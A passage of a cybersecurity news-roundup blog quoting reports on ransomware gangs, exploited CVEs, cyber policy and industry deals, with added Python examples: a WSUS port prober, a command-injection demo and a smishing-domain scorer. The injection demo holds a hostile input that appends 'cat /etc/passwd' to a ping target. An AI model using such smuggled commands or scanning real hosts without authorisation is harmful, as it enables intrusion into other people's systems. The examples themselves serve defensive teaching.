    • “It’s not uncommon for ransomware or extortion gangs like Clop to publicize the names and stolen files of their victims as a pressure tactic, which can suggest that the victim has not negotiated a payment with the gang, or the negotiation broke down. 
    • “Several other organizations have confirmed they are affected by the Oracle E-Business hacks, including Harvard University and American Airlines subsidiary Envoy.”
  • The Hacker News tells us,
    • “Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded.
    • Secure Annex researcher John Tuckner, who flagged the extension “susvsex,” said it does not attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025, by a user named “suspublisher18” along with the description “Just testing” and the email address “donotsupport@example[.]com.”
    • “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the description of the extension. As of November 6, Microsoft has stepped in to remove it from the official VS Code Extension Marketplace.
  • Tech Radar points out,
    • “[Ransomware gang] Rhysida spoofed Microsoft Teams ads on Bing to deliver malware via fake download pages
    • “Victims received OysterLoader and Latrodectus, which deploy ransomware, backdoors, and infostealers
    • “Group operates on RaaS model; past targets include airports, libraries, and U.S. school districts.”

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • “Cloud security company Zscaler [November 3] announced Monday it has acquired SplxAI, an artificial intelligence security platform, in a move to strengthen its ability to protect enterprise AI assets.
    • “Terms were not disclosed. 
    • “Zscaler said the purchase is aimed at enhancing its zero-trust security offerings by integrating Splx’s technology for AI asset discovery, automated red-teaming, and governance. The company said these features will help secure AI applications and services during development and after deployment.
    • “AI is creating enormous value, but its full potential can only be realized when it can be secured,” Zscaler CEO Jay Chaudhry said in a statement.”
  • Security Week adds,
    • “Google and Wiz said the antitrust review initiated by the United States Department of Justice into their planned $32 billion acquisition has been cleared.
    • “The companies announced reaching an agreement on the terms of an acquisition in March 2025. 
    • “News of a Justice Department antitrust review into Google’s planned acquisition of the cloud security giant came to light in mid-June. The goal of the probe was to determine whether the deal would harm competition in the cybersecurity market.
    • “During the recent WSJ Tech Live California event, Wiz CEO Assaf Rappaport confirmed that his company had cleared the regulatory hurdle, noting they are “still in the journey between signing and closing.”
  • Dark Reading offers a commentary about “Closing the AI Execution Gap in Cybersecurity — A CISO Framework. CISOs must navigate five critical dimensions of AI in cybersecurity: augmenting security with AI, automating security with AI, protecting AI systems, defending against AI-powered threats, and aligning AI strategies with business goals. Neglecting any of these areas is a recipe for disaster.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Federal News Network tells us,
    • “The Office of the National Cyber Director is looking to engage industry as it starts to develop a new national cybersecurity strategy.
    • “National Cyber Director Sean Cairncross, speaking at a conference hosted by Palo Alto Networks in Tysons Corner, Va., Thursday, said U.S. cyber efforts of the past have failed to “send a message” to China and other cyber adversaries.
    • “A failure to send a message creates an opening for a miscalculation, that opens the door for a larger problem,” Cairncross said. “And so, what we are looking to do is to change that posture, so that that message is clear.” * * *
    • “I’m not trying to bring CEOs in and beat them over the head and say, do this, or we’ll regulate, or this is a mandate coming down from on high,” he said. “What I’m looking to do is to say where, where are the regulatory friction points in this domain that you deal with, what’s redundant, what’s become too much of a compliance checklist.”
    • “Cairncross said the private sector should have to meet minimum standards for cybersecurity. But he says the White House wants to work with businesses to understand how cybersecurity could be better prioritized against existing regulations.”
    • “Working to harmonize that regulatory structure, it’s incumbent on us to do that and work with you all to do that, hopefully as rapidly as we can,” he said. “But I see this as a true partnership between government and industry, and I think if we can get that in a place where everyone is sort of speaking the same language, it will be incredibly useful for hardening our resiliency.”
    • “The Trump administration’s cyber strategy will also likely feature a focus on normalizing offensive cyber operations.”
  • NextGov/FCW informs us,
    • “Criminal hackers, who for years lacked the sophistication and resources of nation-state cyber adversaries, are now on near-equal footing with state-level powers like China and Russia, thanks to advances in artificial intelligence, the head of the FBI’s Cyber Division said Thursday.
    • “[AI] allows mid-tier actors to really asymmetrically scale in ways that they can’t have impact otherwise, meaning a lot of these cybercriminal groups now have nation-state-type capabilities that they would not otherwise have because they’re using generative AI,” Brett Leatherman said Thursday at the Palo Alto Networks public sector conference in Virginia.” * * *
    • “The FBI has not been as quick to adopt AI in its day-to-day operations because it handles sensitive data that requires stringent protections and oversight to maintain security and legal standards, he said.” * * *
    • “The FBI constantly views data logs and other intelligence collected from legal authorities that can help them track hackers and build computer forensic conclusions. Having AI available to quickly parse those logs would be a benefit, he said, although industry partners are already using their own AI instruments to scan data and report those findings to the FBI.” 
  • Fedscoop adds,
    • “The Department of Energy is set to deploy a new artificial intelligence supercomputer at Oak Ridge National Laboratory early next year, bringing the machine online at “record speeds” thanks to a new public-private partnership the agency unveiled Monday.
    • “The deal with Advanced Micro Devices will provide Oak Ridge with the company’s Lux AI cluster, giving the lab expanded “near-term AI capacity” that will accelerate its work on fusion, fission, materials discovery, advanced manufacturing and grid modernization, per a press release announcing the partnership.
    • “Winning the AI race requires new and creative partnerships that will bring together the brightest minds and industries American technology and science has to offer,” Energy Secretary Chris Wright said in a statement. “That’s why the Trump administration is announcing the first example of a new commonsense approach to computing partnerships with Lux.”
    • Energy also announced plans for the 2028 launch of Discovery, a system built by HPE and powered by AMD processors and accelerators. Discovery, according to the DOE, will “far” outperform Oak Ridge’s Frontier machine — currently the world’s second-largest supercomputer. * * *
    • “The Tennessee lab has been ground zero for many of the country’s advances in AI — and the Trump administration has signaled that there’s more to come. In an RFP released earlier this month, the DOE solicited proposals for the buildout and maintenance of AI data centers and energy generation infrastructure at Oak Ridge.”
  • Dark Reading reports,
    • “As China, Iran, Russia, and the European Union signed onto a new global cybercrime treaty, the United States and a minority of other nations continue to voice concerns over the global agreement’s impact on human rights — and the expansion of covered crimes to include any “serious” offense enabled by information communications technology (ICT).
    • “On Monday, more than 70 nations signed on to the treaty — formally, the United Nations Convention Against Cybercrime — pledging to aid in the investigation and prosecution of any “criminal offences … committed through the use of information and communications technology systems,” according to a copy of the document. Signers of the agreement promise to cooperate on “serious” crimes, which includes any violation of law that has a maximum prison time of at least four years.” * * *
    • [M]any nations signing the treaty may not have such laudable goals. In 2019, Russia began the process to establish the treaty, when its delegates sponsored a resolution to create a framework for combatting cybercrime. The other signatories included a list of authoritarian countries: Belarus, Cambodia, China, Iran, Myanmar, Nicaragua, Syria, and Venezuela, with the highest-ranking country among the sponsors earning a 2.94 on The Economist’s 10-point Democracy Index for 2024. For comparison, the Index’s most democratic nation, Norway, scored a 9.81. The Nordic country did not sign the UN cybercrime treaty, either.
    • “Looking at the group of founders should make any policy watcher skeptical, especially with much of the cybercriminal activity coming from China and Russia, says Zach Edwards, a senior threat analyst with Silent Push, a cyberthreat intelligence firm. He pointed to massive economic costs caused by cybercriminals groups in China and Russia.”
  • Per Cyberscoop,
    • “A 43-year-old Ukrainian national allegedly involved in the Conti ransomware group pleaded not guilty in federal court Thursday to cybercrime charges that could land him in prison for up to 25 years, according to court documents.
    • “Oleksii Oleksiyovych Lytvynenko, also known as Alexsey Alexseevich Litvinenko, was arrested in Ireland in July 2023, extradited to the United States earlier this month and remains in federal custody in Tennessee where at least three of his alleged victims are based.” * * *
    • “Lytvynenko and his co-conspirators used Conti ransomware to attack more than 1,000 victims globally, ensnaring victims in 47 states, Washington, Puerto Rico and about 31 countries, according to the Justice Department. The FBI estimates Conti extorted more than $150 million in ransom payments from victims.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “The Cybersecurity and Infrastructure Security Agency issued updated guidance on a critical vulnerability in Windows Server Update Service and urged security teams to immediately apply patches to their systems and check for potential compromise.
    • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data in WSUS, a tool widely used by IT administrators to deploy Microsoft product updates. 
    • “Security researchers have been tracking a series of exploitation attempts in recent weeks. An initial patch issued in mid-October fell flat, and Microsoft issued an emergency out-of-band security update late last week.
    • “CISA on Wednesday [October 29] issued additional guidance on how to check for potential compromise and warned security teams to take the threat very seriously.
  • and
    • “At least 50 organizations have been impacted by attacks targeting a critical vulnerability in Windows Server Update Service, with most of them located in the U.S., according to researchers at cybersecurity firm Sophos. 
    • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data. A security update issued by Microsoft in mid-October failed to provide adequate protection, and Microsoft issued an emergency out-of-band patch late last week to address the problem. 
    • “Sophos’s own telemetry picked up six incidents linked to the exploitation activity, and additional intelligence gathered by researchers shows at least 50 victims, the company told Cybersecurity Dive.” 
  • CISA added four known exploited vulnerabilities to its catalog this week.
    • October 28, 2025
      • CVE-2025-6204 Dassault Systèmes DELMIA Apriso Code Injection Vulnerability
      • CVE-2025-6205 Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability
        • Security Week discusses these KEVs here.
    • October 30, 2025
      • CVE-2025-24893 XWiki Platform Eval Injection Vulnerability
      • CVE-2025-41244 Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability
        • NIST discusses the XWiki KEV here.
        • Bleeping Computer discusses the Broadcom KEV here.
  • Cyberscoop relates,
    • “F5 CEO François Locoh-Donou said on a company earnings call that there were two categories of impact on customers following a nation-state attacker’s long-term, persistent access to its systems: widespread emergency updates to BIG-IP software and hardware, and customers whose configuration data was stolen during the attack.
    • “We were very impressed frankly, with the speed with which our customers have mobilized resources to be able to make these upgrades and put them in production fairly rapidly,” Locoh-Donou said Monday. F5 helped thousands of customers install critical updates upon disclosure, he added.
    • “The vendor’s latest assessment of the prolonged attack, which it became aware of Aug. 9 and disclosed Oct. 15, indicates F5 remains optimistic it has contained and limited exposure from the breach, which prompted a rare emergency directive from federal cyber authorities when it was disclosed in a regulatory filing.”
  • Per Dark Reading,
    • “A researcher has demonstrated that Windows’ native artificial intelligence (AI) stack can serve as a vector for malware delivery.
    • “In a year where clever and complex prompt injection techniques have been growing on trees, security researcher hxr1 identified a much more traditional way of weaponizing rampant AI. In a proof-of-concept (PoC) shared exclusively with Dark Reading, he described a living-off-the-land attack (LotL) using trusted files from the Open Neural Network Exchange (ONNX) to bypass security engines.”
  • and
    • “A variety of old, abandoned projects, long considered dead, continue to rise up and undermine the cybersecurity posture of the companies who created them.
    • “From code to infrastructure to APIs, these so-called “zombie” assets continue to cause security headaches for companies, and sometimes, lead to breaches. Oracle’s “obsolete” servers, abandoned Amazon S3 buckets used by attackers to distribute malware, and the unmonitored API connecting Optus’ customer-identity database to the Internet are all variations of the zombies plaguing enterprises.
    • “The lack of attention to forgotten — dare we say, “undead” — services causes cybersecurity headaches in two ways, says Andrew Scott, director of product at cybersecurity firm Palo Alto Networks.
    • “If you’ve got a device that has been forgotten, you’re probably not looking after it, so if it were compromised, it may be hard for you to know,” he says. “And two: The longer that those things stay out there, stay unmanaged or not getting the TLC and patch cycles … the more likely that they are vulnerable to risks over time.”

From the ransomware front,

  • Health Exec reports,
    • “On Oct. 27, Russia-based cybercrime group Qilin posted to the dark web claiming it had successfully hacked pharmacy benefit manager (PBM) MedImpact, with the group releasing screenshots of documents that appear to be billing invoices.
    • “In reviewing the post, Cybernews said the snippets are “mostly financial operation details which don’t seem to contain extremely sensitive personal data.” The company later confirmed that what Qilin said was true, releasing a short statement about its ongoing investigation into the incident, which it said is being conducted with the “assistance of one of the nation’s leading cybersecurity firms and is notifying all applicable authorities.” 
    • “The PBM also confirmed that the attack involved the deployment of ransomware, and that at least part of its infrastructure is still down. It said it deployed containment measures upon noticing the breach, often involving taking all systems offline until the situation is assessed.
    • “MedImpact is currently working to restore impacted systems in a new environment that is segregated from the prior infrastructure and protected by multiple layers of defense. Due to these measures, as of today, pharmacy claims for all clients are now adjudicating,” the company wrote. 
    • “The company apologizes for any disruption this issue may cause its clients and partners,” it added.” 
  • Per Bleeping Computer,
    • “CISA confirmed on Thursday [October 30] that a high-severity privilege escalation flaw in the Linux kernel is now being exploited in ransomware attacks.
    • “While the vulnerability (tracked as CVE-2024-1086) was disclosed on January 31, 2024, as a use-after-free weakness in the netfilter: nf_tables kernel component and was fixed via a commit submitted in January 2024, it was first introduced by a decade-old commit in February 2014.
    • “Successful exploitation enables attackers with local access to escalate privileges on the target system, potentially resulting in root-level access to compromised devices.
    • As Immersive Labs explains, potential impact includes system takeover once root access is gained (allowing attackers to disable defenses, modify files, or install malware), lateral movement through the network, and data theft.
  • The HIPAA Journal reports,
    • “The ransomware remediation firm Coveware has reported a growing divide in the ransomware landscape, with larger enterprises facing increasingly targeted, high-cost attacks, whereas attacks on mid-market companies continue to be conducted in volume. Ransomware groups conducting high-volume attacks appear to have found the sweet spot, as while the ransom payments they receive are much lower, the attacks are easier to conduct, and a higher percentage of victims pay up. Attacks on larger companies require more effort, although attacks are far more lucrative when a ransom is paid. Coveware reports that larger organizations are increasingly resisting paying ransoms, having realized that there are few payment benefits, but has warned that these targeted attacks are likely to increase due to falling ransom payments.
    • “Across the board, there has been a sharp fall in both the average and median ransom payments from a 6-year high in Q2, 2025, to the lowest level since Q1, 2023. In Q3, 2025, the average ransom payment fell by 66% to $376,941, with the median ransom payment down 65% to $140,000. In Q1, 2019, 85% of victims of ransomware attacks chose to pay the ransom, compared to a historic low of 23% in Q3, 2025.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • “Artificial intelligence and weakening federal demand had dual impacts on this week’s earnings reports from large cybersecurity companies, which generally posted stronger results than the same time last year.
    • “Security and network specialist F5 posted a fourth-quarter profit of $190.5 million on Monday, up from $165.3 million last year. Its full-year profit was $692.4 million, compared with $566.8 million last year.
    • “However, the company warned of potential sales disruptions stemming from a breach by nation-state hackers. The breach, which was disclosed by F5 in October, was serious: Attackers gained access to the production environment for the company’s most popular products and its database of known software flaws. F5’s products are widely deployed among Fortune 500 companies and the federal government, making the disclosure worthy of briefings by the U.S. Cybersecurity and Infrastructure Security Agency.” * * *
    • “Other cybersecurity companies posted encouraging results. Network security vendor Check Point Software Technologies posted a third-quarter profit of $358.7 million, up from $206.9 million last year. The Israeli company closed its acquisition of AI specialist Lakera last week and said it expects AI to inform its acquisition strategy going forward.” * * *
    • “Infrastructure security specialist Tenable Holdings swung to a $2.3 million profit in its third quarter from a $9.3 million loss the previous year. Co-Chief Executive Stephen Vintz said the company is seeing a shift in customer spending away from traditional defensive strategies toward more proactive technologies that identify weaknesses before they are exploited, largely due to the use of AI.
    • “AI is dramatically reshaping the threat landscape as attacks have become faster, more automated and more sophisticated,” he said on a call with analysts Thursday.
    • “Data protection provider Commvault Systems reported $14.7 million profit for its second quarter on Tuesday, though this slipped from $15.6 million in the same quarter last year. Rival data security company Varonis reported a loss of $29.9 million, wider than the $18.3 million loss the previous year.”
  • Cyberscoop points out,
    • “A new security-focused AI model released Thursday by OpenAI aims to automate bug hunting, patching and remediation.
    • “The model, powered by ChatGPT-5 and given the name Aardvark, has been used internally at OpenAI and among external partners. Currently offered in an invite-only Beta, it’s designed to continuously scan source code repositories to find known vulnerabilities and bugs, assess and prioritize their potential severity, then patch and remediate them.
    • “In a blog post published on the company’s website, OpenAI claims that Aardvark “does not rely on traditional program analysis techniques like fuzzing or software composition analysis.”
    • “Instead, it uses LLM-powered reasoning and tool-use to understand code behavior and identify vulnerabilities,” the blog stated. “Aardvark looks for bugs as a human security researcher might: by reading code, analyzing it, writing and running tests, using tools, and more.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Federal News Network reports,
    • “For years, the influential Cyberspace Solarium Commission has advanced recommendations on cyber policy that have slowly but steadily been adopted by Congress and federal agencies.
    • “But now, commission leaders are confronting a new reality: progress is “stalling, and in several areas, slipping,” largely due to the Trump administration’s federal workforce cuts.
    • “In its latest annual report, the Cyberspace Solarium Commission 2.0 — the “2.0” because the commission no longer resides within Congress but at the Foundation for the Defense of Democracies — found that there had been a “reversal” on its recommendations for the first time in the commission’s five-year history.”
  • Dark Reading adds,
    • “Cyberattacks against US agencies were rising steadily even before Oct. 1, in anticipation of the shutdown. Researchers at the Media Trust then observed a spike of activity on its very first day.
    • “At this point, they’re projecting that the feds will experience north of 555 million cyberattacks by the end of the month [of October] — an 85% increase over the already more active than usual month of September.”
    • “To make matters worse, Media Trust CEO Chris Olson points out that those 555 million attacks aren’t the cheap phishing chum one might expect to dominate such a dataset.
    • “These are targeted digital attacks through websites, apps, and targeted advertising. What we are detecting are actual interactions with employees,” he says.”
  • Dark Reading also informs us,
    • “A massive seizure by the US government of cryptocurrency from a sprawling Southeast Asia cybercrime syndicate has raised hopes that coordinated actions against cybercriminal groups can help undermine their profits.
    • “On Oct. 14, the US Department of Justice — along with the Drug Enforcement Agency, the Department of State, and other agencies — announced the seizure of 127,271 bitcoin kept in “unhosted wallets” and the indictment of Chen Zhi, the founder and chairman of the Prince Holding Group, on charges of conspiracy to commit wire fraud and money laundering. The seized bitcoin, stored in 25 wallets, are worth more than $14 billion, and were valued at nearly $15 billion on the day of the announcement.” * * *
    • “Repeating the win will be difficult, however.
    • “While the US Department of Justice and government officials announced the seizure and indictment on Oct. 14, the actual investigation and enforcement actions occurred last year and the investigation took much longer. The seizure of the funds likely took place in June and July of 2024, when the wallets holding the bitcoin “suddenly lit up … suggesting coordinate[d] enforcement activity,” says TRM Labs’ Redboard.
    • “These operations are exceptionally hard to pull off,” he says. “They require cooperation across agencies and borders, and — critically — access to private keys. Investigators can map transactions forever, but they can’t move assets without those keys. The fact that the US was able to gain control here means that digital and physical evidence aligned, resulting in a great outcome.” * * *
    • “The successful seizure may also reverse a trend that blockchain experts have noted: Cybercriminals’ increasing dependency on bitcoin. While other cryptocurrencies exist — and stable coin has become popular among some investors — bitcoin’s self-custody attribute has been seen as a significant benefit, says Eric Jardine, cybercrimes research manager at Chainalysis, a crypto intelligence firm.” * * *
    • “Whether the seizure by the US government results in a movement away from bitcoin remains to be seen.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “Security researchers are warning that cyber threat actors are abusing a critical vulnerability in Microsoft Windows Server Update Service. 
    • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data and could allow intruders to execute code without authorization.
    • “Researchers at Huntress said they have seen attackers exploiting the vulnerability in four different customers’ networks. 
    • “Senior security researcher John Hammond described the attack as a simple “point-and-shoot” technique, noting that the recent release of a proof of concept made the attack trivially accessible for any hacker to launch.” * * *
    • “In an advisory released late Friday [October 24], CISA urged users to identify servers that are vulnerable to exploitation and immediately apply the upgrades. These servers have WSUS Server Role enabled, and ports open to 8530/8531, according to CISA.”
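The CISA advice quoted above (and in the Cybersecurity Dive items on CVE-2025-59287 earlier on this page) boils down to an inventory question: which servers have the WSUS role listening on 8530/8531? The script below is an added example, not code from Cybersecurity Dive, CISA or Microsoft. It probes a host list for the two default WSUS ports in parallel and returns the hosts that need patch verification first. The host names in the inventory are placeholders (assumed), and the ports are the defaults named in the advisory.

```python
"""Added example (not code from the Cybersecurity Dive article or CISA's advisory):
find hosts that expose the default WSUS listener ports, 8530 (HTTP) and 8531 (HTTPS),
which CISA's CVE-2025-59287 guidance says to identify and patch. The host names in
the inventory below are placeholders; point it at your own server list."""
import socket
from concurrent.futures import ThreadPoolExecutor

WSUS_PORTS = (8530, 8531)  # default client-facing WSUS ports named in the advisory


def port_open(host: str, port: int, timeout: float = 1.5) -> bool:
    """True if a TCP connect to host:port completes within the timeout.
    DNS failures and refused/filtered connections both count as closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe_hosts(hosts, ports=WSUS_PORTS, timeout=1.5, workers=32):
    """Probe every host for every port, hosts in parallel.
    Returns {host: [open ports]}; hosts with nothing open map to an empty list."""
    def probe(host):
        return host, [p for p in ports if port_open(host, p, timeout)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(probe, hosts))


def exposed(results):
    """Hosts with at least one WSUS port reachable: these need patch verification
    and the compromise checks from CISA's follow-up guidance first."""
    return sorted(host for host, open_ports in results.items() if open_ports)


if __name__ == "__main__":
    # Placeholder inventory (assumed names); replace with your asset list.
    inventory = ["wsus01.corp.example", "wsus02.corp.example", "files01.corp.example"]
    results = probe_hosts(inventory)
    for host, open_ports in results.items():
        print(f"{host:28} {'OPEN ' + str(open_ports) if open_ports else 'no WSUS ports'}")
    print("review for CVE-2025-59287:", exposed(results))
```

Two caveats when reading the output. A closed port is not a clean bill of health: the role can sit behind a host firewall or on a non-default port, so on the server itself confirm the role with Get-WindowsFeature UpdateServices. And an open port is not proof of compromise or of a missing patch: confirm the out-of-band update is installed on each exposed host, then run the compromise checks CISA published.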
  • Cyberscoop adds,
    • “Last week, Cybersecurity and Infrastructure Security Agency officials spoke candidly about the challenges they faced tracking the use of F5 products across the civilian federal government. While CISA knows there are thousands of instances of F5 currently in use, it admitted it wasn’t certain where each instance was deployed. 
    • “The uncertainty came as the agency issued an emergency directive related to F5, instructing other government agencies to find and patch any F5 instances. The urgency stemmed from the fact that F5 itself had revealed a nation-state had gained a long-term foothold in its systems.
    • “One of the main goals of the directive: “help us identify the different F5 technology in the federal network,” as one official told reporters.
    • “CISA didn’t already have a complete picture of that despite the billions of dollars spent on a program, Continuous Diagnostics and Mitigation (CDM), designed for, among other things, “increasing visibility into the federal cybersecurity posture,” which CISA’s website for the program states is one of its main four goals.
    • “CISA’s lack of awareness about the extent of the F5 vulnerability’s presence in the federal government highlights a weakness in a program that is, by and large, a well-regarded one. But the fact that CDM did not automatically identify F5 prevalence is a circumstance of fast-changing technology and a shortcoming in the part of CDM that’s focused on keeping track of digital assets, according to current and former CISA officials and cyber industry professionals.”
  • CISA added the following known exploited vulnerabilities to its catalog this week,
  • Cybersecurity Dive relates,
    • “Critical flaws in TP-Link Omada and Festa VPN routers could allow attackers to take control of a device, according to a report released Thursday from Forescout Research – Vedere Labs. 
    • “One vulnerability, tracked as CVE-2025-7850, could enable OS command injection through improper sanitation of user input, according to the researchers. The flaw, which has a severity score of 9.3, in some cases can be exploited without requiring credentials to the device.
    • “A second vulnerability, tracked as CVE-2025-7851, allows root access via residual debug code, and has a severity score of 8.7. The flaw exposes hidden functionality that allows for root login via SSH, Forescout researchers told Cybersecurity Dive.
    • “TP-Link devices have been the target of exploitation activity in the past, including large botnets such as Quad7, says Daniel dos Santos, head of research at Forescout Research.” * * *
    • The researchers said they are not aware of any exploitation involving the newly found vulnerabilities but given that one is rated as critical and the other as high-severity, users should immediately apply new firmware updates issued by TP-Link.”
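The first TP-Link flaw above is described only by its class, OS command injection through improper sanitation of user input, so the following is an added example of that class, not TP-Link's firmware or Forescout's proof of concept. It models a generic router-style "ping diagnostic" handler (a hypothetical handler, assumed for illustration): the unsafe builder interpolates user input into a shell string, the hardened builder allow-lists the input and passes it as its own argv element so no shell parses it.

```python
"""Added example, not TP-Link's firmware or Forescout's proof of concept: the OS
command injection class behind CVE-2025-7850, shown as a generic router-style
'ping diagnostic' handler. The unsafe builder drops user input into a shell
string; the hardened builder allow-lists the input and passes it as its own
argv element so no shell ever parses it."""
import ipaddress
import re
import subprocess

# One DNS label: alphanumeric start/end, hyphens inside, at most 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def build_ping_unsafe(target: str) -> str:
    """Vulnerable pattern: 'target' is interpolated verbatim into a command line
    that the caller hands to a shell (os.system / popen / subprocess shell=True),
    so ';', '|', '&&', backticks and $(...) become attacker-chosen commands."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Allow-list validation: accept an IPv4/IPv6 literal or a DNS hostname and
    reject everything else (shell metacharacters, whitespace, a leading '-')."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    # fullmatch (not match with '$') so a trailing newline cannot slip through
    if len(target) <= 253 and HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def is_safe_target(target: str) -> bool:
    """True if validate_target() accepts the value."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_safe(target: str) -> list:
    """Hardened pattern: validated input as a separate argv element, for use with
    subprocess.run(argv) and shell=False. Even if validation were bypassed, the
    string is never parsed by a shell, so metacharacters are just bytes in argv[3]."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping_safe(target: str) -> int:
    """Execute the hardened form without a shell; returns ping's exit status."""
    proc = subprocess.run(build_ping_safe(target), shell=False,
                          capture_output=True, timeout=10)
    return proc.returncode


if __name__ == "__main__":
    hostile = "10.0.0.1; cat /etc/passwd"  # constructed attacker input
    print("unsafe command line :", build_ping_unsafe(hostile))
    print("hardened argv       :", build_ping_safe("10.0.0.1"))
    print("hostile accepted?   :", is_safe_target(hostile))
```

The two defenses are layered on purpose: validation stops the hostile value at the boundary, and argv-without-shell means a validation gap still cannot turn input into a second command. Fixing only the first (a blacklist of ';' and '|') is the pattern that keeps producing router CVEs.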
  • and
    • “Half of all organizations have been “negatively impacted” by security vulnerabilities in their AI systems, according to recent data from EY.
    • “Only 14% of CEOs believe their AI systems adequately protect sensitive data.
    • “AI’s new risks are compounding the difficulty of securing networks with a patchwork of cybersecurity defenses as organizations use an average of 47 security tools, EY found.”
  • Fierce Network adds,
    • “Beware. It’s that time of year when many employees are being told it’s open enrollment and they’re given a deadline to renew their health benefits. But if an unverified and unexpected message comes through SMS on your smartphone, it might be a smishing attack.
    • “Don’t click on the link, however tempting it may be.
    • “That’s one bit of advice from Chris Novak, VP of Global Cybersecurity Solutions at Verizon Business. He talked with Fierce about the latest Verizon Mobile Security Index that shows just how vulnerable mobile devices are to attacks. And guess what? AI isn’t helping matters. In fact, it’s putting devices more at risk.”
  • Cyberscoop notes,
    • “Researchers have uncovered a long-running phishing campaign that uses text messages to trick victims, and it’s both bigger and more complex than previously thought. The operation, dubbed Smishing Triad, is managed in Chinese and involves thousands of malicious actors, including dozens of active, high-level participants, Palo Alto Networks’ research unit told CyberScoop.
    • “Unit 42 has traced about 195,000 domains to the highly decentralized phishing operation since January 2024. Researchers say more than two-thirds of the malicious domains are registered through Hong Kong-based registrar Dominet (HK) Limited using China-based domain name system infrastructure.
    • “Most of the attack domains (58%) are hosted on U.S.-based IP addresses, while 21% are hosted in China and 19% reside in Singapore. The global phishing operation is designed to collect sensitive information, including national identification numbers, home addresses, financial details and credentials, according to Unit 42.
    • “The malicious domains, which include hyphenated strings followed by a top-level domain, trick victims into thinking they are visiting a legitimate site. These domains impersonate services across many critical sectors including toll road services, multinational financial service and investment firms, e-commerce markets and cryptocurrency exchanges, health care organizations, law enforcement agencies and social media platforms.”
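Unit 42's description of the Smishing Triad domains (a hyphenated label in front of a TLD, impersonating toll, financial, e-commerce, health-care, law-enforcement and social-media services, two-thirds registered through one Hong Kong registrar) suggests a cheap triage heuristic for new-registration or passive-DNS feeds. The block below is an added example, not Unit 42's detection logic: keyword lists, scoring weights and the sample feed are constructed for illustration, and only the registrar name on the watchlist comes from the article.

```python
"""Added example, not Unit 42's detection logic: a triage heuristic for the domain
shape the article describes (a hyphenated label in front of a TLD, impersonating
toll, delivery, financial, government, health-care and social-media services),
with the registrar named in the reporting as an enrichment signal. Keyword lists,
scoring weights and the sample domains are constructed for illustration."""
import re
from dataclasses import dataclass

# Sector lure words (assumed, not from the article) typical of smishing lures.
LURE_WORDS = {
    "toll": {"toll", "tolls", "ezpass", "fastrak", "sunpass", "tollway"},
    "delivery": {"usps", "ups", "parcel", "delivery", "postal"},
    "finance": {"bank", "secure", "invest", "wallet", "crypto", "exchange"},
    "government": {"dmv", "gov", "police", "court", "irs"},
    "health": {"health", "clinic", "pharmacy", "medical"},
    "social": {"facebook", "instagram", "meta", "tiktok"},
}
ACTION_WORDS = {"pay", "bill", "verify", "update", "fee", "unpaid", "notice", "alert", "login"}
REGISTRAR_WATCHLIST = {"dominet (hk) limited"}  # registrar named in the Unit 42 reporting


@dataclass
class Verdict:
    domain: str
    score: int
    reasons: list


def registrable_label(domain: str) -> str:
    """Label immediately left of the TLD (simplified: no public-suffix handling,
    so 'x.co.uk' would return 'co'; use a PSL library in production)."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def score_domain(domain: str, registrar=None) -> Verdict:
    """Additive score: hyphenation, sector lure word, action word, digits, registrar."""
    label = registrable_label(domain)
    tokens = {t for t in label.split("-") if t}  # whole-token match avoids 'gov' in 'government'
    score, reasons = 0, []
    hyphens = label.count("-")
    if hyphens:
        score += min(hyphens, 3)
        reasons.append(f"{hyphens} hyphen(s) in label")
    sectors = sorted(s for s, words in LURE_WORDS.items() if words & tokens)
    if sectors:
        score += 2
        reasons.append("sector lure: " + ",".join(sectors))
    if ACTION_WORDS & tokens:
        score += 2
        reasons.append("action word in label")
    if re.search(r"\d", label):
        score += 1
        reasons.append("digits in label")
    if registrar and registrar.lower() in REGISTRAR_WATCHLIST:
        score += 2
        reasons.append("registrar on watchlist")
    return Verdict(domain, score, reasons)


def triage(records, threshold=4):
    """records: iterable of (domain, registrar-or-None). Returns Verdicts at/above threshold."""
    return [v for v in (score_domain(d, r) for d, r in records) if v.score >= threshold]


# Constructed sample feed (not real observed domains).
SAMPLE_FEED = [
    ("ezpass-toll-pay.example", "Dominet (HK) Limited"),
    ("usps-parcel-fee2.example", "Dominet (HK) Limited"),
    ("secure-wallet-login.example", "Other Registrar Inc"),
    ("state-dmv-notice.example", None),
    ("my-photo-blog.example", None),
    ("example.com", "Other Registrar Inc"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_FEED):
        print(f"{v.score:2d}  {v.domain:32} {'; '.join(v.reasons)}")
```

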